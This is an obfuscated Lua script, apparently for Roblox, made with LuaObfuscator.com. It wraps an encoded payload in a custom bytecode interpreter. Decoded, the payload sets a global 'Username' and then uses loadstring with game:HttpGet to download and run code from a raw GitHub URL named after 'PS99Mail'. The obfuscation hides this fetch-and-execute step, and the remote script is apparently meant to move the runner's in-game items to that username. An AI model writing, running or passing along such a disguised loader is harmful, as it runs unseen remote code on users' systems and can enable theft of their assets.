--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=0 -0 ;local v32;while true do if (v31==(0 -(0 + 0))) then v32=v1(v16,v19,v19);v19=v19 + (1 -0) ;v31=569 -(367 + 201) ;end if (v31==(928 -(214 + 713))) then return v32;end end end v23=nil;function v23()local v33=0;local v34;local v35;while true do if (v33==(1 + 0)) then return (v35 * (1133 -((1347 -(68 + 997)) + 595))) + v34 ;end if ((1637 -(1523 + 114))==v33) then v34,v35=v1(v16,v19,v19 + 2 + 0 );v19=v19 + (2 -0) ;v33=1;end end end v18=3;end if (v18==4) then function v25()local v36=v24();local v37=v24();local v38=1271 -(226 + 1044) ;local v39=(v21(v37,4 -3 ,20) * (((336 -217) -(32 + 50 + 35))^(32 + 0))) + v36 ;local v40=v21(v37,5 + 16 ,40 -9 );local v41=((v21(v37,(2176 -(1069 + 118)) -(892 + 65) )==(2 -1)) and  -(1 -0)) or (1 -0) ;if (v40==(350 -(87 + 263))) then if (v39==(180 -(67 + 113))) then return v41 * (0 + 0) ;else local v92=0 -(0 -0) ;while true do if (v92==(0 + 0)) then v40=1;v38=0;break;end end end elseif (v40==(8135 -6088)) then return ((v39==(952 -(802 + (328 -178)))) and (v41 * ((2 -1)/0))) or (v41 * NaN) ;end return v8(v41,v40-(1855 -832) ) * (v38 + (v39/((1 + 1 + 0)^(1049 -(915 + 82))))) ;end v26=nil;function v26(v42)local v43;if  not v42 then v42=v24();if (v42==(0 -0)) then return "";end end v43=v3(v16,v19,(v19 + v42) -1 );v19=v19 + v42 ;local v44={};for v66=1, #v43 do v44[v66]=v2(v1(v3(v43,v66,v66)));end return v6(v44);end v18=5;end if (v18==6) then v29=nil;function v29()local v45=0 + 0 ;local v46;local v47;local v48;local v49;local v50;local v51;while true do local v68=0;local v69;while true do if ((1194 -(352 + 842))~=v68) then else v69=0 -0 ;while true do if (v69~=(1822 -(1483 + 338))) then else if (v45~=2) then else for v101=1,v50 do local v102=1695 -(1229 + 466) ;local v103;local v104;local v105;while true do if (v102~=(579 -(386 + 192))) then else v105=nil;while true do if (v103==1) then if (v104==1) then v105=v22()~=0 ;elseif (v104==(1208 -(696 + 510))) then v105=v25();elseif (v104==3) then v105=v26();end v51[v101]=v105;break;end if (v103==0) then local v160=0 -0 ;local v161;while true do if (v160==(1262 -(1091 + 171))) then v161=0 + 0 ;while true do if (v161~=(3 -2)) then else v103=3 -2 ;break;end if (v161==(374 -(123 + 251))) then v104=v22();v105=nil;v161=4 -3 ;end end break;end end end end break;end if (v102~=0) then else v103=0;v104=nil;v102=699 -(208 + 490) ;end end end v49[3]=v22();for v106=1 + 0 ,v24() do local v107=0 + 0 ;local v108;local v109;while true do if (v107~=(836 -(660 + 176))) then else local v151=0 + 0 ;while true do if (v151~=(202 -(14 + 188))) then else v108=0;v109=nil;v151=676 -(534 + 141) ;end if (v151==(1 + 0)) then v107=1 + 0 ;break;end end end if (v107~=1) then else while true do if (v108~=0) then else v109=v22();if (v21(v109,1 + 0 ,1)~=(0 -0)) then else local v166=0;local v167;local v168;local v169;local v170;local v171;while true do if (v166==1) then v169=nil;v170=nil;v166=2;end if (v166==0) then v167=0;v168=nil;v166=1 -0 ;end if (v166==(5 -3)) then v171=nil;while true do if (v167~=(1 + 0)) then else local v172=0 + 0 ;while true do if (v172~=(397 -(115 + 281))) then else v167=2;break;end if (v172==(0 -0)) then v170=nil;v171=nil;v172=1;end end end if (v167~=(2 + 0)) then else while true do if (v168~=1) then else local v175=0 -0 ;local v176;while true do if (v175==(0 -0)) then v176=0;while true do if (v176==(868 -(550 + 317))) then v168=2;break;end if (v176==(0 -0)) then local v183=0 -0 ;local v184;while true do if (v183~=(0 -0)) then else v184=0;while true do if (v184==(286 -(134 + 151))) then v176=1666 -(970 + 695) ;break;end if (0~=v184) then else local v189=0;while true do if (v189==(1 -0)) then v184=1;break;end if (v189~=(1990 -(582 + 1408))) then else v171={v23(),v23(),nil,nil};if (v169==0) then local v190=0 -0 ;local v191;while true do if (v190==(0 -0)) then v191=1824 -(1195 + 629) ;while true do if (v191==0) then v171[3]=v23();v171[5 -1 ]=v23();break;end end break;end end elseif (v169==1) then v171[3]=v24();elseif (v169==(243 -(187 + 54))) then v171[783 -(162 + 618) ]=v24() -(2^(12 + 4)) ;elseif (v169==(2 + 1)) then local v196=0 -0 ;local v197;local v198;local v199;while true do if (v196~=(0 -0)) then else v197=0 + 0 ;v198=nil;v196=1637 -(1373 + 263) ;end if (v196~=1) then else v199=nil;while true do if (v197~=(1000 -(451 + 549))) then else local v200=0;while true do if (v200==(1 + 0)) then v197=1 -0 ;break;end if ((0 -0)==v200) then v198=1384 -(746 + 638) ;v199=nil;v200=1 + 0 ;end end end if (v197==1) then while true do if (v198~=(0 -0)) then else v199=341 -(218 + 123) ;while true do if (v199==0) then v171[1584 -(1535 + 46) ]=v24() -((2 + 0)^16) ;v171[4]=v23();break;end end break;end end break;end end break;end end end v189=1;end end end end break;end end end end break;end end end if (v168==0) then local v177=0 + 0 ;while true do if (v177==(561 -(306 + 254))) then v168=1 + 0 ;break;end if (0==v177) then v169=v21(v109,3 -1 ,1470 -(899 + 568) );v170=v21(v109,4,4 + 2 );v177=1;end end end if (v168==3) then if (v21(v170,3,3)~=(2 -1)) then else v171[607 -(268 + 335) ]=v51[v171[294 -(60 + 230) ]];end v46[v106]=v171;break;end if (v168~=2) then else local v179=0;while true do if (v179~=0) then else local v182=572 -(426 + 146) ;while true do if (v182==(0 + 0)) then if (v21(v170,1,1457 -(282 + 1174) )~=1) then else v171[813 -(569 + 242) ]=v51[v171[5 -3 ]];end if (v21(v170,2,2)==1) then v171[1 + 2 ]=v51[v171[3]];end v182=1;end if (v182==1) then v179=1;break;end end end if (v179==(1025 -(706 + 318))) then v168=1254 -(721 + 530) ;break;end end end end break;end if (v167==0) then local v173=0;local v174;while true do if (v173==(1271 -(945 + 326))) then v174=0;while true do if (v174~=(2 -1)) then else v167=1 + 0 ;break;end if (v174==0) then v168=700 -(271 + 429) ;v169=nil;v174=1;end end break;end end end end break;end end end break;end end break;end end end v45=3;end if (v45==(3 + 0)) then local v100=1500 -(1408 + 92) ;while true do if (0==v100) then local v144=0;while true do if ((1086 -(461 + 625))==v144) then for v162=1289 -(993 + 295) ,v24() do v47[v162-1 ]=v29();end return v49;end end end end end break;end if (v69==0) then if (0~=v45) then else v46={};v47={};v48={};v45=1 + 0 ;end if (v45~=1) then else v49={v46,v47,nil,v48};v50=v24();v51={};v45=2;end v69=1;end end break;end end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v52)if (v1(v52,2)==79) then local v84=0;while true do if (v84==0) then v20=v0(v3(v52,1,1));return "";end end else local v85=v2(v0(v52,16));if v20 then local v93=0;local v94;while true do if (v93==1) then return v94;end if (v93==0) then v94=v5(v85,v20);v20=nil;v93=1;end end else return v85;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v53,v54,v55,v56=v1(v16,v19,v19 + 2 + 1 );v19=v19 + 1 + 3 ;return (v56 * (4907054 + 11870162)) + (v55 * ((18332 -(1749 + 20)) + 48973)) + (v54 * (785 -(406 + 30 + 93))) + v53 ;end v25=nil;v18=4;end if (v18==7) then function v30(v57,v58,v59)local v60=v57[1];local v61=v57[2];local v62=v57[3];return function(...)local v70=v60;local v71=v61;local v72=v62;local v73=v28;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v86=0,v78 do if (v86>=v72) then v76[v86-v72 ]=v77[v86 + 1 ];else v80[v86]=v77[v86 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do v82=v70[v74];v83=v82[1];if (v83<=7) then if (v83<=3) then if (v83<=1) then if (v83==0) then do return;end else local v110=v82[2];local v111=v80[v82[3]];v80[v110 + 1 ]=v111;v80[v110]=v111[v82[4]];end elseif (v83==2) then if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v59;else v80[v82[2]]=v59[v82[3]];end else local v115=0;local v116;local v117;local v118;local v119;while true do if (v115==0) then v116=v82[2];v117,v118=v73(v80[v116](v13(v80,v116 + 1 ,v82[3])));v115=1;end if (v115==2) then for v157=v116,v75 do local v158=0;while true do if (v158==0) then v119=v119 + 1 ;v80[v157]=v117[v119];break;end end end break;end if (1==v115) then v75=(v118 + v116) -1 ;v119=0;v115=2;end end end elseif (v83<=5) then if (v83==4) then local v120=v82[2];local v121,v122=v73(v80[v120](v13(v80,v120 + 1 ,v82[3])));v75=(v122 + v120) -1 ;local v123=0;for v141=v120,v75 do v123=v123 + 1 ;v80[v141]=v121[v123];end else v59[v82[3]]=v80[v82[2]];end elseif (v83>6) then v80[v82[2]]();else v80[v82[2]]=v82[3];end elseif (v83<=11) then if (v83<=9) then if (v83>8) then do return;end elseif ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v59;else v80[v82[2]]=v59[v82[3]];end elseif (v83==10) then local v128=v82[2];local v129=v80[v82[3]];v80[v128 + 1 ]=v129;v80[v128]=v129[v82[4]];else v80[v82[2]]();end elseif (v83<=13) then if (v83>12) then v59[v82[3]]=v80[v82[2]];else local v135=0;local v136;while true do if (v135==0) then v136=v82[2];v80[v136]=v80[v136](v13(v80,v136 + 1 ,v75));break;end end end elseif (v83==14) then v80[v82[2]]=v82[3];else local v139=0;local v140;while true do if (v139==0) then v140=v82[2];v80[v140]=v80[v140](v13(v80,v140 + 1 ,v75));break;end end end v74=v74 + 1 ;end end;end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v63,v64,v65)if v65 then local v89=(v63/((1324 -(1249 + 73))^(v64-(1 + (0 -0)))))%((1147 -(466 + 679))^(((v65-(2 -1)) -(v64-1)) + (2 -1))) ;return v89-(v89%(1901 -(106 + 1794))) ;else local v90=0 + 0 ;local v91;while true do if ((114 -(4 + 110))==v90) then v91=(1 + (585 -(57 + 527)))^(v64-1) ;return (((v63%(v91 + v91))>=v91) and 1) or (0 -0) ;end end end end v22=nil;v18=2;end end end v15("LOL!063O0003083O00557365726E616D6503083O004661722O67656D73030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F7269000A3O00120E3O00023O0012053O00013O0012083O00033O001208000100043O00200100010001000500120E000300064O0004000100034O000F5O00022O000B3O000100016O00017O00",v9(),...);
